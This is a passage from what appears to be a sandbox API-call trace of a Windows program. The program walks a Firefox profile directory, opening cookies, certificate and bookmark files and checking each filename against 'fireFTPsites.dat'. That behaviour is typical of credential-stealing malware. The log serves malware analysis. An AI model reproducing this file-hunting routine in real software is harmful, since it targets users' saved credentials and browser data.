dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.241] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x18 [0590.241] CreateFileMappingW (hFile=0x4c8, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x660 [0590.242] MapViewOfFile (hFileMappingObject=0x660, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.242] LocalAlloc (uFlags=0x40, uBytes=0x88) returned 0x57aeb0 [0590.242] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0590.242] CloseHandle (hObject=0x660) returned 1 [0590.242] CloseHandle (hObject=0x4c8) returned 1 [0590.242] LocalFree (hMem=0x63bd28) returned 0x0 [0590.242] StrStrIW (lpFirst="addons.json", lpSrch="fireFTPsites.dat") returned 0x0 [0590.242] LocalFree (hMem=0x63bbf0) returned 0x0 [0590.242] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52df9c | out: lpFindFileData=0x52df9c) returned 1 [0590.242] lstrcmpiW (lpString1="bookmarkbackups", lpString2=".") returned 1 [0590.242] lstrcmpiW (lpString1="bookmarkbackups", lpString2="..") returned 1 [0590.242] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.242] lstrlenW (lpString="\\") returned 1 [0590.242] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.242] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.242] lstrlenW (lpString="bookmarkbackups") returned 15 [0590.242] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.242] LocalAlloc (uFlags=0x40, uBytes=0x138) returned 0x56cab0 [0590.242] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.242] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups") returned 91 [0590.242] lstrlenW (lpString="\\*.*") returned 4 [0590.242] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups") returned 91 [0590.242] LocalAlloc (uFlags=0x40, uBytes=0x140) returned 0x2ed9860 [0590.242] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\*.*", lpFindFileData=0x52dd24 | out: lpFindFileData=0x52dd24) returned 0x57ca60 [0590.242] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.242] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd24 | out: lpFindFileData=0x52dd24) returned 1 [0590.243] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.243] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.243] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd24 | out: lpFindFileData=0x52dd24) returned 1 [0590.243] lstrlenW (lpString="\\") returned 1 [0590.243] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups") returned 91 [0590.243] LocalAlloc (uFlags=0x40, uBytes=0x13a) returned 0x2ed99a8 [0590.243] lstrlenW (lpString="bookmarks-2017-06-30_5.json") returned 27 [0590.243] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\") returned 92 [0590.243] LocalAlloc (uFlags=0x40, uBytes=0x170) returned 0x5e6108 [0590.243] LocalFree (hMem=0x2ed99a8) returned 0x0 [0590.243] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.243] CloseHandle (hObject=0x660) returned 1 [0590.243] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x78 [0590.243] LocalAlloc (uFlags=0x40, uBytes=0x170) returned 0x63f8c8 [0590.243] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json", lpDst=0x63f8c8, nSize=0x78 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json") returned 0x78 [0590.243] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.243] CloseHandle (hObject=0x660) returned 1 [0590.243] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.243] GetFileSize (in: hFile=0x660, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xbdb [0590.243] CreateFileMappingW (hFile=0x660, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x668 [0590.243] MapViewOfFile (hFileMappingObject=0x668, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.243] LocalAlloc (uFlags=0x40, uBytes=0x88) returned 0x57b060 [0590.243] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0590.244] CloseHandle (hObject=0x668) returned 1 [0590.244] CloseHandle (hObject=0x660) returned 1 [0590.244] LocalFree (hMem=0x63f8c8) returned 0x0 [0590.244] StrStrIW (lpFirst="bookmarks-2017-06-30_5.json", lpSrch="fireFTPsites.dat") returned 0x0 [0590.244] LocalFree (hMem=0x5e6108) returned 0x0 [0590.244] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd24 | out: lpFindFileData=0x52dd24) returned 1 [0590.244] lstrlenW (lpString="\\") returned 1 [0590.244] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups") returned 91 [0590.244] LocalAlloc (uFlags=0x40, uBytes=0x13a) returned 0x2ed99a8 [0590.244] lstrlenW (lpString="bookmarks-2017-07-26_5.json") returned 27 [0590.244] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\") returned 92 [0590.244] LocalAlloc (uFlags=0x40, uBytes=0x170) returned 0x5e6108 [0590.244] LocalFree (hMem=0x2ed99a8) returned 0x0 [0590.244] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.244] CloseHandle (hObject=0x660) returned 1 [0590.244] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x78 [0590.244] LocalAlloc (uFlags=0x40, uBytes=0x170) returned 0x63f8c8 [0590.244] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json", lpDst=0x63f8c8, nSize=0x78 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json") returned 0x78 [0590.244] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.244] CloseHandle (hObject=0x660) returned 1 [0590.244] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.244] GetFileSize (in: hFile=0x660, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xbdb [0590.244] CreateFileMappingW (hFile=0x660, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x668 [0590.244] MapViewOfFile (hFileMappingObject=0x668, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.245] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0590.245] CloseHandle (hObject=0x668) returned 1 [0590.245] CloseHandle (hObject=0x660) returned 1 [0590.245] LocalFree (hMem=0x63f8c8) returned 0x0 [0590.245] LocalFree (hMem=0x5e6108) returned 0x0 [0590.245] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd24 | out: lpFindFileData=0x52dd24) returned 0 [0590.245] FindClose (in: hFindFile=0x57ca60 | out: hFindFile=0x57ca60) returned 1 [0590.245] LocalFree (hMem=0x2ed9860) returned 0x0 [0590.245] LocalFree (hMem=0x56cab0) returned 0x0 [0590.245] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52df9c | out: lpFindFileData=0x52df9c) returned 1 [0590.245] lstrlenW (lpString="\\") returned 1 [0590.245] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.245] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.245] lstrlenW (lpString="cert8.db") returned 8 [0590.245] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.245] LocalAlloc (uFlags=0x40, uBytes=0x12a) returned 0x63bbf0 [0590.245] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.245] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cert8.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\cert8.db"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.245] CloseHandle (hObject=0x4c8) returned 1 [0590.245] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cert8.db", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x55 [0590.245] LocalAlloc (uFlags=0x40, uBytes=0x12a) returned 0x63bd28 [0590.245] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cert8.db", lpDst=0x63bd28, nSize=0x55 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cert8.db") returned 0x55 [0590.245] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cert8.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\cert8.db"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.245] CloseHandle (hObject=0x4c8) returned 1 [0590.245] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cert8.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\cert8.db"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.246] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x10000 [0590.246] CreateFileMappingW (hFile=0x4c8, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x660 [0590.246] MapViewOfFile (hFileMappingObject=0x660, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.246] LocalAlloc (uFlags=0x40, uBytes=0x88) returned 0x57b840 [0590.246] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0590.247] CloseHandle (hObject=0x660) returned 1 [0590.247] CloseHandle (hObject=0x4c8) returned 1 [0590.247] LocalFree (hMem=0x63bd28) returned 0x0 [0590.247] StrStrIW (lpFirst="cert8.db", lpSrch="fireFTPsites.dat") returned 0x0 [0590.247] LocalFree (hMem=0x63bbf0) returned 0x0 [0590.247] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52df9c | out: lpFindFileData=0x52df9c) returned 1 [0590.247] lstrlenW (lpString="\\") returned 1 [0590.247] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.247] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.247] lstrlenW (lpString="compatibility.ini") returned 17 [0590.247] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.247] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x56cab0 [0590.247] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.247] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\compatibility.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\compatibility.ini"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.247] CloseHandle (hObject=0x4c8) returned 1 [0590.247] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\compatibility.ini", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5e [0590.247] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x2ed9860 [0590.247] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\compatibility.ini", lpDst=0x2ed9860, nSize=0x5e | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\compatibility.ini") returned 0x5e [0590.247] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\compatibility.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\compatibility.ini"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.247] CloseHandle (hObject=0x4c8) returned 1 [0590.247] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\compatibility.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\compatibility.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.247] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xce [0590.247] CreateFileMappingW (hFile=0x4c8, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x660 [0590.247] MapViewOfFile (hFileMappingObject=0x660, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.248] LocalAlloc (uFlags=0x40, uBytes=0x88) returned 0x57b0f0 [0590.248] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0590.248] CloseHandle (hObject=0x660) returned 1 [0590.248] CloseHandle (hObject=0x4c8) returned 1 [0590.248] LocalFree (hMem=0x2ed9860) returned 0x0 [0590.248] StrStrIW (lpFirst="compatibility.ini", lpSrch="fireFTPsites.dat") returned 0x0 [0590.248] LocalFree (hMem=0x56cab0) returned 0x0 [0590.248] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52df9c | out: lpFindFileData=0x52df9c) returned 1 [0590.248] lstrlenW (lpString="\\") returned 1 [0590.248] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.248] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.248] lstrlenW (lpString="content-prefs.sqlite") returned 20 [0590.248] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.248] LocalAlloc (uFlags=0x40, uBytes=0x142) returned 0x5e6108 [0590.248] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.248] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\content-prefs.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\content-prefs.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.248] CloseHandle (hObject=0x4c8) returned 1 [0590.248] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\content-prefs.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x61 [0590.248] LocalAlloc (uFlags=0x40, uBytes=0x142) returned 0x63f8c8 [0590.248] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\content-prefs.sqlite", lpDst=0x63f8c8, nSize=0x61 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\content-prefs.sqlite") returned 0x61 [0590.248] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\content-prefs.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\content-prefs.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.248] CloseHandle (hObject=0x4c8) returned 1 [0590.248] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\content-prefs.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\content-prefs.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.249] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x38000 [0590.249] CreateFileMappingW (hFile=0x4c8, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x660 [0590.249] MapViewOfFile (hFileMappingObject=0x660, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.250] LocalAlloc (uFlags=0x40, uBytes=0x88) returned 0x57ad00 [0590.250] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0590.251] CloseHandle (hObject=0x660) returned 1 [0590.251] CloseHandle (hObject=0x4c8) returned 1 [0590.251] LocalFree (hMem=0x63f8c8) returned 0x0 [0590.251] StrStrIW (lpFirst="content-prefs.sqlite", lpSrch="fireFTPsites.dat") returned 0x0 [0590.251] LocalFree (hMem=0x5e6108) returned 0x0 [0590.251] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52df9c | out: lpFindFileData=0x52df9c) returned 1 [0590.251] lstrlenW (lpString="\\") returned 1 [0590.252] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.252] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.252] lstrlenW (lpString="cookies.sqlite") returned 14 [0590.252] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.252] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x56cab0 [0590.252] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.252] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cookies.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\cookies.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.252] CloseHandle (hObject=0x4c8) returned 1 [0590.252] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cookies.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5b [0590.252] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x2ed9860 [0590.252] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cookies.sqlite", lpDst=0x2ed9860, nSize=0x5b | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cookies.sqlite") returned 0x5b [0590.252] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cookies.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\cookies.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.252] CloseHandle (hObject=0x4c8) returned 1 [0590.252] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cookies.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\cookies.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.252] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x80000 [0590.252] CreateFileMappingW (hFile=0x4c8, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x660 [0590.252] MapViewOfFile (hFileMappingObject=0x660, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x3800000 [0590.254] LocalAlloc (uFlags=0x40, uBytes=0x88) returned 0x57ad90 [0590.254] UnmapViewOfFile (lpBaseAddress=0x3800000) returned 1 [0590.257] CloseHandle (hObject=0x660) returned 1 [0590.257] CloseHandle (hObject=0x4c8) returned 1 [0590.257] LocalFree (hMem=0x2ed9860) returned 0x0 [0590.257] StrStrIW (lpFirst="cookies.sqlite", lpSrch="fireFTPsites.dat") returned 0x0 [0590.257] LocalFree (hMem=0x56cab0) returned 0x0 [0590.257] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52df9c | out: lpFindFileData=0x52df9c) returned 1 [0590.258] lstrlenW (lpString="\\") returned 1 [0590.258] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.258] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.258] lstrlenW (lpString="downloads.sqlite") returned 16 [0590.258] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.258] LocalAlloc (uFlags=0x40, uBytes=0x13a) returned 0x56cab0 [0590.258] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.258] CreateFileW 